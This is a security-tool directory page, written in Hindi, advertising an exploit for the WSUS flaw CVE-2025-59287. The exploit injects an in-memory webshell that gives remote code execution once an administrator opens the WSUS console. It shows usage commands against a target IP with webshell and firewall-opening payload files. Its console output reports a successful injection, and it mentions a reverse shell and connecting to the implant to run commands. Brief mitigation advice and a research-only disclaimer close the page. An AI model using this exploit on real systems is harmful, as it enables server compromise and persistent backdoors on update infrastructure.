Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-59287 — CVE-2025-59287 के लिए एक्सप्लॉइट, जो WSUS सर्वरों में WolfShell मेमोरी वेबशेल इंजेक्ट करता है ताकि एडमिन कंसोल खोले जाने पर रिमोट कोड एक्ज़ीक्यूशन प्राप्त किया जा सके। | Kitploit
उपकरण/GitHubGitHub/0x7556/cve-2025-59287
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHub0x7556/cve-2025-59287

CVE-2025-59287

CVE-2025-59287 के लिए एक्सप्लॉइट, जो WSUS सर्वरों में WolfShell मेमोरी वेबशेल इंजेक्ट करता है ताकि एडमिन कंसोल खोले जाने पर रिमोट कोड एक्ज़ीक्यूशन प्राप्त किया जा सके।

रिपॉजिटरी देखें
7310 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-59287 WSUS भेद्यता पुनरुत्पादन

CVE-2025-59287 — WolfShell वूल्वरिन फॉरवर्ड मेमोरी शेल इंजेक्ट करना

सारांश

CVE-2025-59287 WSUS से संबंधित घटकों में तार्किक दोष का उपयोग करके WolfShell मेमोरी शेल को लक्षित सर्वर में इंजेक्ट करता है। जब व्यवस्थापक WSUS कंसोल खोलता है (डिफ़ॉल्ट रूप से यादृच्छिक 1-30 मिनट के भीतर ट्रिगर होता है), मेमोरी शेल ट्रिगर होकर रिमोट कोड निष्पादन (RCE) का कारण बनता है। इस दस्तावेज़ में शोषण उदाहरण, आवश्यक फ़ाइलें और सुरक्षा अनुशंसाएँ शामिल हैं।

उपयोग उदाहरण

उपयोग

लक्षित सर्वर पर ysoserial.net डिसेरिएलाइज़ेशन पेलोड भेजें, कार्यक्षमता अनुकूलन योग्य है, यह प्रोजेक्ट वूल्वरिन मेमोरी शेल इंजेक्ट करने का प्रदर्शन करता है

root@kitploit:~
Usage: CVE-2025-59287 <target_url> <payload_file>

वूल्वरिन WebShell ASPX शेल इंजेक्ट करने का उदाहरण

root@kitploit:~
CVE-2025-59287 http://192.168.50.159:8530 wolfaspx.txt

मेमोरी में वूल्वरिन WolfShell फॉरवर्ड शेल इंजेक्ट करने का उदाहरण

root@kitploit:~
C:\Users\Administrator\Desktop\>CVE-2025-59287 http://192.168.50.159:8530 wolfshell.txt
[+] Target: http://192.168.50.159:8530/
[+] Payload read successfully, length: 20413 characters

[+] Getting Server ID...
[+] Server ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Auth cookie with Server ID...
[+] Using ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Sending event with payload...
[+] SUCCESS!
[!] RCE will trigger when you open the WSUS console!
[!] to cleanup remove the hawktrace.local computer from WSUS

फ़ायरवॉल में पोर्ट 7556 खोलने का उदाहरण

root@kitploit:~
CVE-2025-59287 http://192.168.50.159:8530 allow7556.txt

exp

PowerShell रिवर्स शेल

win2019 Defender ब्लॉक करके हटा देता है, उपयोग नहीं किया जा सकता Defende

WSUS कंसोल खोलकर भेद्यता ट्रिगर करें

जैसा कि चित्र में दिखाया गया है, पोर्ट 7556 सफलतापूर्वक सुन रहा है, जो दर्शाता है कि वूल्वरिन मेमोरी फॉरवर्ड शेल इंजेक्ट हो चुका है WolfDoor 1

वूल्वरिन मेमोरी शेल से कनेक्ट कर CMD कमांड निष्पादित करें

WolfDoor 2

सुरक्षा अनुशंसाएँ

  • प्रभावित WSUS सर्वरों पर तुरंत विक्रेता द्वारा प्रदान किया गया पैच या अस्थायी शमन उपाय लागू करें।
  • WSUS में संदिग्ध क्लाइंट (जैसे hawktrace.local) की जाँच करें और उन्हें हटाएँ।
  • WSUS प्रबंधन कंसोल तक पहुँच को प्रतिबंधित और ऑडिट करें, सुनिश्चित करें कि केवल विश्वसनीय व्यवस्थापक ही पहुँच सकें।
  • असामान्य मेमोरी शेल या संदिग्ध मॉड्यूल का पता लगाने के लिए घुसपैठ का पता लगाने, मेमोरी स्कैनिंग और होस्ट अखंडता निगरानी उपकरणों का उपयोग करें।
  • पैच लागू होने से पहले, अविश्वसनीय वातावरण में WSUS कंसोल खोलने या संदिग्ध अपडेट आइटम संभालने से बचें।

अस्वीकरण

यह दस्तावेज़ केवल सुरक्षा अनुसंधान और सुरक्षा उद्देश्यों के लिए है। कृपया अनधिकृत सिस्टम या हमले की गतिविधियों के लिए संबंधित शोषण कोड का उपयोग न करें।

संदर्भ लिंक

https://github.com/0x7556/wolfshell https://github.com/0x7556/CVE-2025-59287

टूल डाउनलोड करें